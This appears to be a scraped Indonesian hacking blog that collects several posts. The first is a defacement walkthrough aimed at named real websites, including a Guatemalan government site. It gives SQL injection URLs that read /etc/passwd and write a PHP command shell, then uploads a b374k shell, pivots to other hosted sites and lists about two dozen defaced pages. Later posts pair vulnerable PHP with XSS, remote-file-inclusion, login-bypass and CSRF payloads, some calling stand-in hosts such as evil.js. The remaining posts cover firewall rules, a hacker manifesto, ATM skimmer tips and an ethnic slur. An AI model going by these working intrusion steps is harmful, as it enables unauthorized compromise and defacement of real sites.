kali ini gw mau share beberapa teknik2(POC) buat ngedeface .

kalo yang sudah pada tau teknik2 ini jangan pada ngina

yah maklum nubie mau coba bikin artikel :p

yang sudah baca yah jangan lupa komen2nya

yah itung2 belajar bareng 🙂

ok mulai aja deh ke tutor

hal yg diperlukan :

1. berdoa
2. siapin makanan ringan
3. dan segelas kopi (java)
4. koneksi internet + komputernya 🙂

nah kalo udah pada siap liangsung pergi ke om google untuk melakukan pencarian dengan dork :

kemudian pilih deh web target yang memiliki vulnerability 🙂

target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file(‘/etc/passwd’),8,9,10/*

setelah masuk ke website targget ubah url nya yg tadinya load_file(‘/etc/passwd’) menjadi

“<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”

dan diakhir url ditambahkan

+INTO+OUTFILE+”lokasi direktory(folder) yang permisionya 777/namashell.php”/*

real target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,3,4,5,6,”<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”,8,9,10+INTO+OUTFILE+”/home/inacif/www/design/default/james0bastershell.php”/*

setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil

atau tidak dengan menjalankan perintah ls -al pada cmd=

real target : http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al

upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php 😀 dengan perintah

download sebagai berikut :

dan hasilnya sebagai berikut :

bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.

kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory

berikut hasil URL jumpingan dari http://www.inacif.gob.gt/ ke  http://www.cinde.com.gt/

URL : http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/

dan berikut hasil defaceannya 😀

• http://www.cinde.com.gt/webcontrol/james0baster.html
• http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html
• http://www.asociacioncambiandovidas.org/media/Image/james0baster.html
• http://sanjuansacatepequez.com.gt/media/Image/james0baster.html
• http://merka.com.gt/media/Image/james0baster.html
• http://difoto.com/media/Image/james0baster.html
• http://web.ecssa.com.gt/media/Image/james0baster.html
• http://dmarie.com.gt/media/Image/james0baster.html
• http://www.horcalsa.com/media/Image/james0baster.html
• http://aplytek.com/media/Image/james0baster.html
• http://www.ffacsa.com/media/Image/james0baster.html
• http://www.palixcan.com/media/Image/james0baster.html
• http://www.rototec.com.gt/media/Image/james0baster.html
• http://www.pinbol.net/media/Image/james0baster.html
• http://www.nisfessa.com/media/Image/james0baster.html
• http://www.fmglobo.com.gt/media/Image/james0baster.html
• http://www.artgala.org/media/Image/james0baster.html
• http://www.cognos.com.gt/media/Image/james0baster.html
• http://www.saluvita.com.gt/media/Image/james0baster.html
• http://www.copredeh.gob.gt/media/Image/james0baster.html
• http://adinmsa.com/media/Image/james0baster.html
• http://elmastil.com/media/Image/james0baster.html
• http://starkids.com.gt/media/Image/james0baster.html
• http://www.inacif.gob.gt/design/default/james0baster.html

dan masih banyak lagi :p

sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih

http://www.inacif.gob.gt/design/default/james0basterscaner.php

NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDDEN AJA.

ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH

Posting POC buat ngedeface++ ditampilkan lebih awal di james0baster.web.id.

#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp –syn -j synjahat
iptables -A synjahat -m limit –limit 1/s –limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP

kemudian jalankan di konsole/terminal

root@bt:~# sh closesyn.sh

2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood

#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit –limit 1/s –limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP

root@bt:~# sh closeping.sh

coba lakukan testing dengan perintah

root@bt:~#ping [target] -s 6500

Ok sekian dulu. Thank’s jika ada yang kurang jelas silahkan tanya 😀

_{This article was originally published in forum thread: Mencegah serangan Syn & Ping Flood Attack (DOS) started by bilanganbiner}

Posting Mencegah serangan Syn & Ping Flood Attack (DOS) ditampilkan lebih awal di james0baster.web.id.

Jangan cuma bisa attack. Tapi juga harus bisa defend. 

Langsung aja..

Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL.

Biasanya halaman dinamis ini
bentuknya kayak gini http://uhui.com/vuln.php?id=[Input_Angka]

Bentuk umum kode di halaman dinamis php untuk membaca database melalui MySQL :

Injection Flaw terjadi karena inputnya gak kefilter dengan baik. Sehingga input ‘$id’ yang seharusnya diisi dengan (biasanya) angka bisa diisi dengan query SQL.. Yang mengakibatkan query SQL tersebut dieksekusi sehingga injector bisa melakukan berbagai hal misalnya membaca isi database, membaca suatu file di situs tersebut, dll.

Nah, untuk mencegah hal tersebut sebaiknya kita memfilter inputnya sebelum diproses dengan SQL.

Contoh kode filternya :

Penjelasan :

Pertama-tama menggunakan error_reporting(0); . Kode tersebut digunakan untuk mendisable error reporting sehingga jika terjadi error tidak keluar pesan error.

Selanjutnya variabel $id disaring dulu menggunakan mysql_real_escape_string yang berfungsi untuk menambahkan slash (\) apabila ada tanda kutip pada input $id.

Setelah disaring dengan mysql_real_escape_string, disaring lagi dengan melakukan pengecekan apakah inputnya berupa angka atau bukan dengan menggunakan kode !ctype_digit . Jika ternyata bukan angka maka akan ditolak. Selain pengecekan input apakah angka atau bukan, dilakukan juga pengecekan apakah inputnya sama atau lebih kecil dari 0 (minus) jika iya maka akan ditolak.

Abis itu baru deh aplikasikan ke syntax SQL-nya.

Untuk lebih jelasnya silahkan baca ulang kode sebelum difilter dan setelah difilter berkali-kali sampai paham.

Posting SQL Injection Flaw Patching ditampilkan lebih awal di james0baster.web.id.

Ditulis oleh: gentoo

“If you know both yourself and your enemy, you can win a hundred battles without a single loss.”

Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi mengenali kelemahan diri sendiri, karena dengan begitu kita dapat seimbang dala, bertahan dan menyerang.  Saya harap artikel ini nantinya akan dapat menjadi referensi singkat yang membahas tentang menyerang dan bertahan dalam dunia keamanan web (web security), dan artikel ini diharapkan juga bisa menjadi titik mula bagi yang tertarik dengan keamanan web, sekaligus pembuka mata bagi para programmer web agar sedikit banyak mulai menaruh perhatian pada keamanan aplikasi yang meraka buat.  Artikel ini akan membahas beberapa jenis celah keamanan web yang umumnya selalu menjadi primadon dikalangan para pemerhati keamanan web, tetapi bahasan disini bukan mencakup detil tiap celah, tetapi lebih ke arah Proof-of-concept dari cara bertahan dan menyerang. Disajikan dengan menggunakan PHP sebagai bahasa pemrograman “dynamic”, HTML, serta mysql sebagai “database engine”.  Formatnya pun akan selalu sama, penyajian kode yang memiliki celah, cara memperkuatnya (bertahan) kemudian diikuti dengan bagaimana metode untuk mengexploitasinya. Jangan berharap artikel ini akan mengajarkan anda dari Nol, bagaimana membuat web, mengkode dengan PHP dan mysql, atau penjelasan detil (pengertian-panjang-lebar) tentang setiap celah.  Partisipasi aktif andalah yang akan menentukan apakah artikel ini akan bermanfaat buat anda nantinya

===// Yin-Yang \\===

====// XSS Reflected \\====
kode yang memiliki celah untuk di serang:

——–\\ sweet.php
PHP Code:

echo ‘Selamat Datang’ . $_GET[‘sweet’];

——–//
Adapun kode untuk melindungi adalah dengan menambahkan fungsi “strip_tags” atau “htmlspecialchars” untuk memeriksa variabel tersebut terlebih dahulu.
——–\\sweet-patch.php
PHP Code:

echo ‘Selamat Datang’ . strip_tags($_GET[‘sweet’]);

atau PHP Code:

echo ‘Selamat Datang’ . htmlspecialchars($_GET[‘sweet’]);

——–//

——// Eksploitasi \\——
Code:sweet.php?sweet=<script>alert(“XSS”)</script>

====// XSS Persistent \\====

kode yang memiliki celah untuk di serang:

——–\\ sweet.php
PHP Code:

$sweet  = trim($_POST[‘txtSweet’]);$sweet  = mysql_real_escape_string($sweet);$query  = “INSERT INTO sweet (sweet) VALUES (‘$sweet’);”;

——–//
Adapun fungsi yang digunakan untuk mengamankannya adalah “stripslashes”, “addslashes”, “htmlspecialchars”
——–\\sweet-patch.php
PHP Code:

$sweet = stripslashes($sweet);$sweet = mysql_real_escape_string($sweet);$sweet = htmlspecialchars($sweet);$query = “INSERT INTO sweet (sweet) VALUES (‘$sweet’);”;

——–//

——// Eksploitasi \\——
Code:

sweet.php?sweet=<SCRIPT SRC=http://dare.dev.il/evil.js?<B>Bedanya, xss exploit ini akan tersimpan ke database dan akan selalu di eksekusi setiap halaman sweet.php di load, selanjutnya tinggal keahlian anda berkreasi pada script evil.js

====// File Inclusion \\====

Kode yang memiliki celah untuk di serang:

——–\\berkas.php
PHP Code:

$file = $_GET[‘halaman’];

——–//

Adapun Untuk mengamankan berkas.php, cukup dengan mendefinisikan file yangingin kita include secara pasti.
——–\\berkas-patch.php
PHP Code:

$file = $_GET[‘halaman’];

// hanya mengijinkan sweet.phpif ( $file != “sweet.php” ) {echo “ERROR: File not found!”;exit;}

——–//

|——| Atau untuk melengkapinya, silahkan melakukan serring “Off” pada Directive| allow_url_fopen| allow_url_include| pada php.ini|——

——// Eksploitasi \\——

Code:berkas.php?halaman=http://dare.dev.il/evil.phpSelanjutnya tergantung keahlian anda berkreasi pada script evil.php, agar berbagai perintah dalam evil.php dapat tereksekusi, ada beberapa syarat lain yang harus dipenuhi, dan ini menjadi PR anda untuk mencari tahu.

====// SQL Injection \\====

SQL injection adalah salah satu teknik yang cukup tua untuk dibahas, celah ini pada web aplikasilah yang paling banyak memberikan andil kepada terkuasainya banyak webserver. Celah ini bisa saya bilang multiplatform karena bisa Database dapat berpasangan dengan bahasa permrograman apapun dan berjalan di sistem-operasi apapun.
Untuk teknik ini saya tidak ingin panjang lebar, tetapi khusus untuk celah lawas ini, kode yang akan saya berikan lengkap, dan bagi para pencinta “salin & tempel” akan dengan mudah dapat mengapliaksikannya, hmm sepertinya tidak juga, karena setidaknya kamu harus paham database, membuat tabel dan mengkoneksikannyadengan php
Ok, berikut adalah kode yang telah memiliki tempat sendiri dalam sejarah keamanan aplikasi web 😆

——–//vulnlogin.php

PHP Code:

<table><form name=”member” method=”post” action=”#”><tr><td colspan=”2″><b>Member Login</b></tr><tr><td>Username</td><td><input type=”text” name=”username” value=”” size=”40″></tr><tr><td>Password</td><td><input type=”password” name=”password” value=”” size=”40″></tr>
<tr><td colspan=”2″><input type=”submit” name=”submit” value=”Submit”><input type=”reset” name=”reset” value=”Reset”></td></form></table>
<?phpinclude ‘config.php’; // ini adalah konfigurasi koneksi aplikasi ke database,ga bisa buat? 😆
$username = $_POST[‘username’];$password = $_POST[‘password’];
$q = “SELECT username, password FROM member WHERE username = ‘$username’ AND \password = ‘$password’ “;
$r = mysql_query($q);if (!$r) {print mysql_error();} else {$row = mysql_fetch_row($r);if (($row[0] != “”) && ($row[1] != “”)) {echo “&nbsp;&nbsp;<a href=somerandompagesnameforyou.php>Yeah, you are in!</a>”;} else {echo”<pre> &nbsp;&nbsp;You need to register as a member to login! </pre>”;}}
?>

——–//

dan untuk mengamankannya adalah dengan melakukan filtering pada keduavariabel “username” dan “password”
PHP Code:$username = stripslashes($username);$username = mysql_escape_string($username);$password = stripslashes($password);$password = mysql_real_escape_string($password);|—-| Untuk memperkuatnya, seandainya ada yang terlewat, melakukan setting| “On” untuk| magic_quotes_gpc| pada setting PHP.ini|—-

——// Eksploitasi \\——

Masukkan ‘or ‘1=1” (l33t) pada input box username/password untuk membypasslogin, sehingga rikues akan jadi seperti ini
|—-|
PHP Code:SELECT username, password FROM member WHERE username = ”or’1=1”’ AND password = ”or’1=1”’|—
Selanjutnya, anda simpulkan sendiri

===// Cross Site Requesr Forgery \\===

Kode berikut adalah mempertunjukkan sebuah halaman ganti password untuk admin, yang tidak melakukan pemeriksaan password saat ini, sehingga memungkinkan celah CSRF digunakan.

——–\\ganti.php

PHP Code:

<?php
if (isset($_GET[‘ganti’])) {$pwd_baru = $_GET[‘pwd_baru’];$pwd_baru2 = $_GET[‘pwd_baru2’];
if (($pwd_baru == $pwd_baru2)){$pwd_baru = mysql_real_escape_string($pwd_baru);$pwd_baru = md5($pwd_baru);
$insert=”UPDATE `users` SET pwd = ‘$pwd_baru’ WHERE user = ‘admin’;”;$result=mysql_query($insert) or die(‘<pre>’ . mysql_error() . ‘</pre>’ );
echo “<pre>Password Admin Berubah </pre>”;mysql_close();}else{echo “<pre> Password tidak cocok. </pre>”;}
}?>

——–//
Adapun untuk memperbaikinya adalah, dengan melakukan pemeriksaan password saat ini terlebih dahulu sebelum merubah password

——–\\ganti-patch.php

PHP Code:

<?php
if (isset($_GET[‘ganti’])) {$pwd = $_GET[‘pwd’];$pwd_baru = $_GET[‘pwd_baru’];$pwd_baru2 = $_GET[‘pwd_baru2′];
$pwd = stripslashes( $pwd );$pwd = mysql_real_escape_string( $pwd );$pwd = md5( $pwd );
// Periksa password saat ini (pwd)$qry = “SELECT pwd FROM `users` WHERE user=’admin’ AND pwd=’$pwd’;”;$result = mysql_query($qry) or die(‘<pre>’ . mysql_error() . ‘</pre>’ );
if (($pwd_baru == $pwd_baru2) && ( $result && mysql_num_rows( $result ) == 1 )){$pwd_baru = mysql_real_escape_string($pwd_baru);$pass_new = md5($pwd_baru);
$insert=”UPDATE `users` SET pwd = ‘$pwd_baru’ WHERE user = ‘admin’;”;$result=mysql_query($insert) or die(‘<pre>’ . mysql_error() . ‘</pre>’ );
echo “<pre> Password Admin Berubah </pre>”;mysql_close();}
else{echo “<pre> Passwords Baru tidak cocok atau password lama anda salah. </pre>”;}
}?>

———//

——// Eksploitasi \\——

Adapun cara eksploitasinya adalah melibatkan kelalaian sang admin, umumnya attacker akan mengirim link tersbut ke email, atau melalui forum dsb dengan harapan sang admin akan meng-click-nya.
Code:<a href=http://nice.ang.el/ganti.php?pwd=&pwd_baru=dudul&pwd_baru2=dudul&ganti=ganti#>klik saya</a>

===// Penutup \\===

Oke, saya harap anda semua yang membaca akan pusing, dan disinilah orang-orang terpilih akan mengikis pembaca lainnya, yup, dengan cepat anda akan segera mencoba dan mencari tahu apa yang saya tulis disini, google! sejak awal di luncurkan adalah referensi terbaik.
Pelajari berbagai fungsi-fungsi yang saya singgung diatas, secara pelan dan jangan terburu-buru , selebihnya selamat datang di dunia web aplikasi yang ‘penuh dengan intrik-intrik, dan semoga sedikit dari saya dapat bermanfaat untuk semua. Logika anda sangat di perlukan disini!

===// Reference \\===

[1].google.inc, http://google.com

[2].OWASP, “The Open Web Application Security Project”, http://owasp.org

[3].semua web aplikasi yang telah saya lihat kode php-nya

Copas dari http://ezine.echo.or.id/ezine21/e21_005.txt
dan diambil dari sumber .
Semoga bermanfaat.

Posting Web Security Yin-Yang (Attacking & Defending) ditampilkan lebih awal di james0baster.web.id.

Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal.
Kami menjelajah, dan kalian sebut kami criminal.
Kami mengejar pengetahuan, dan kalian sebut kami criminal.
Kami hadir tanpa perbedaan warna kulit, kebangsaan ataupun prasangka keagamaan, dan kalian sebut kami criminal.
Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, kalian berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut criminal.
Ya, aku memang seorang criminal.
Kejahatanku adalah rasa keingintahuanku.
Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakana dan pikirkan, bukan pada penampilan mereka.
Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan.
Aku memang seorang hacker, dan inilah manifesto saya.
Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
Bagaimanapun juga, kami semua senasib seperjuangan.

Posting Manifesto Seorang Hacker ditampilkan lebih awal di james0baster.web.id.

walah sebelumnya saya beritahu terlebih dahulu bahwa mesin skimmer terjual bebas di internet , gimana tidak maraknya pembobolan kalo alatnya aja sudah terjual bebas http://www.indoforum.org/showthread.php?p=1601861

penjelasan pemakaian alat tersebut pun sudah tersebar di internet melalui video yang terdapat di youtube http://www.youtube.com/watch?v=m3qK46L2b_c&feature=related dan http://www.youtube.com/watch?v=tS80yLWdOhA

setelah membaca baca saya mempunyai saran/tips untuk pengambilan uang di ATM.

1.Lihat ke sekeliling ruang ATM, mungkin ada hal2 yg mencurigakan seperti kamera tersembunyi (tentunya bukan kamera ATM itu sendiri). Kamera ATM selalunya dipasang diatas bagian belakang/agak nyamping mesin ATM. Ini berfungsi untuk mengcapture wajah pengguna ATM. Kalau ada Kamera yg posisinya berbeda kita harus lebih hati2 jgn2 itu merupakan kamera untuk melihat pergerakan jari kita untuk menekan Pin ATM

2.Setelah melakukan transaksi ATM (kartu ATM sudah keluar), biasakannya memasukkan kembali kartu anda ke dalam mesin ATM.  Kemudian masukkan pin yg acak (salah) dan tekan cancel. Lakukan 2 – 3 kali untuk lebih amannya. Teknologi yg dipakai untuk pencurian  Identitas (nomor pin) biasanya hanya merekam transaksi terakhir dari mesin ATM termasuk memasukkan nomor pin.  So, karena pada transaksi terakhir kita memasukkan nomor pin yg salah, otomatis kartu ATM kita nggak bisa di hacked.

3.Untuk ATM mandiri, bisa mengikuti SMS banking. Hanya untuk cara ini hanya memberikan SMS ke kita kalo ada transaksi >= Rp. 1 jt.

Alat yg menempel pada mesin Atm mandiri DIDUGA merupakan alat yang dapat mencopy data pada kartu atm dan nomor pin nasabah yang telah melakukan transaksi di mesin atm tersebut.

Alat tersebut diduga pernah dipasang di mesin ATM Mandiri di : Top 100 Penuin dan Mall BCS. Segera blokir kartu Atm melalui Call Mandiri 14000 apabila anda merasa telah melakukan transaksi di ATM yang terdapat alat tambahan dan hubungi kantor cabang Bank Mandiri terdekat untuk mengganti kartu ATM. (www.resep.web.id)

Ada slot Card reader, berguna untuk membaca kartu dan selanjutnya digandakan.

Perhatikan tempat brosur diatas, biasa juga bukan? Tidak! Panah merah, disanalah Kamera pengintai telah dipasang. Kamera mengarah ke Monitor dan Keyboard ATM, hasil rekaman akan dikirim dengan jaringan tanpa kabel.

Diatas adalah gambar dari kotak brosur setelah dibuka

Posting Kasus Pembobolan Mesin ATM (Teknologi Skimmer) ditampilkan lebih awal di james0baster.web.id.

malah mempermalukan diri sendiri ntuh orang2 malingsia.

Posting Jangan Terlalu Percaya ditampilkan lebih awal di james0baster.web.id.